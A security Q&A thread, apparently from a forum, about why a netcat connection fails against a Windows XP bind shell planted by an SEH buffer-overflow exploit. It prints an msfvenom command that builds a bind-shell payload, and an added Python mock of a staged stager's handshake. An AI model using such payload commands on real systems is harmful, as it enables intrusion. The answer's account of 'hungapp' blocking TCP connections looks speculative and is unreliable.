
Running an SEH BoF exploit script that contains a payload generated with msfvenom as follows:

msfvenom --payload windows/shell/bind_tcp --format py --arch x86 --platform windows --bad-chars "\x00\x20" EXITFUNC=seh

After running the script containing the said payload, I checked all active connections on the victim machine (WinXP SP3) by running netstat -an; there is an open port listening on 4444 (the default port for the msf payload). However, on the attacker's machine (Fedora 27) I was not able to spawn the shell using netcat, as follows:

nc [victim IP] 4444

After running the above command the cursor just blinks below it, and after hitting Enter (Return), nc is killed and so is the vulnerable program on the victim's PC. Does anybody have any ideas?

The only possible explanation right now is that the problem lies within the payload from msfvenom. I assume that because the payload was definitely executed, since there was an open port 4444 on the victim's PC. So if the problem did not exist while the script was running, it must be the payload that is creating the problem. What do you guys think?

0x5929
  • How is the target machine listening on port 4444? Using netcat, or how? – OscarAkaElvis Apr 13 '18 at 08:17
  • No, after running the exploit script the buffer holds my payload, which is executed and binds a TCP shell on port 4444 – 0x5929 Apr 13 '18 at 15:46
  • I used netcat on my end (attacker machine) and tried to connect to the TCP shell on port 4444 at my target machine's IP, but could not connect – 0x5929 Apr 13 '18 at 15:52
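
Added example (not code from the original post or from Metasploit): a small Python model of the staged-payload handshake that sits behind the symptom described above. windows/shell/bind_tcp is a staged payload: what listens on 4444 is only the stager, which after accept() reads a 4-byte little-endian stage length and then that many bytes of stage from whatever connects, and exploit/multi/handler is the component that sends them. A plain nc sends nothing until Enter is pressed, and then only a newline, which is not a valid stage header; the stageless equivalent, windows/shell_bind_tcp, is the one netcat can drive directly. The mock stager, the sample stage bytes and the two client functions below are assumptions written for this illustration only.

```python
import socket
import struct
import threading

# Constructed stand-in for a Metasploit stage (not real shellcode): the
# framing is what matters here, not the bytes.
SAMPLE_STAGE = b"\x90" * 16 + b"<stage bytes>"


def mock_stager(server_sock, result):
    """Model (assumption, not Metasploit code) of what a staged bind_tcp
    stager does after accept(): one recv() for a 4-byte little-endian
    stage length, then recv() in a loop until that many bytes have
    arrived, then jump into the stage. Here the "jump" is just recording
    the stage; a short or closed read is recorded as failure (the real
    stager gives up on a failed read)."""
    conn, _ = server_sock.accept()
    with conn:
        hdr = conn.recv(4)                      # single recv, like the stager
        if len(hdr) < 4:
            # A bare newline from netcat looks like this to the stager.
            result["error"] = "short length header: %r" % hdr
            return
        (length,) = struct.unpack("<I", hdr)
        stage = b""
        while len(stage) < length:
            chunk = conn.recv(min(4096, length - len(stage)))
            if not chunk:                       # peer closed mid-stage
                result["error"] = "connection closed after %d of %d stage bytes" % (
                    len(stage), length)
                return
            stage += chunk
        result["stage"] = stage                 # real stager: ret into this buffer


def handler_send_stage(host, port, stage):
    """What exploit/multi/handler does for a staged bind_tcp payload:
    connect to the bind port and push the length prefix plus the stage."""
    with socket.create_connection((host, port)) as s:
        s.sendall(struct.pack("<I", len(stage)) + stage)


def netcat_enter(host, port):
    """What the question describes: nc connects, the operator presses
    Enter (nc sends a single newline), then the connection goes away."""
    with socket.create_connection((host, port)) as s:
        s.sendall(b"\n")


def run_scenario(client_fn):
    """Listen on an ephemeral loopback port, run client_fn against it and
    return the mock stager's outcome ({'stage': ...} or {'error': ...})."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    result = {}
    worker = threading.Thread(target=mock_stager, args=(srv, result))
    worker.start()
    client_fn("127.0.0.1", port)
    worker.join(timeout=5)
    srv.close()
    return result


if __name__ == "__main__":
    print("handler:", run_scenario(lambda h, p: handler_send_stage(h, p, SAMPLE_STAGE)))
    print("netcat :", run_scenario(netcat_enter))
```

Run it directly to see both outcomes: the handler-style client gets the stage through, the netcat-style client leaves the stager with a one-byte header and nothing to execute. The practical check this suggests is to confirm whether the payload name has a slash in it (staged) before reaching for nc instead of the handler.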

1 Answer


After a while of messing with the attack, I noticed that the exploit would crash the program and the error message that was raised contained a module called hungapp and an offset of 00000000. Some more research was done; hungapp looks like a Microsoft security feature that blocks TCP connections. The last Microsoft security update for the victim's PC was published on 5/15/2017, which most likely patched against this type of SEH attack.

0x5929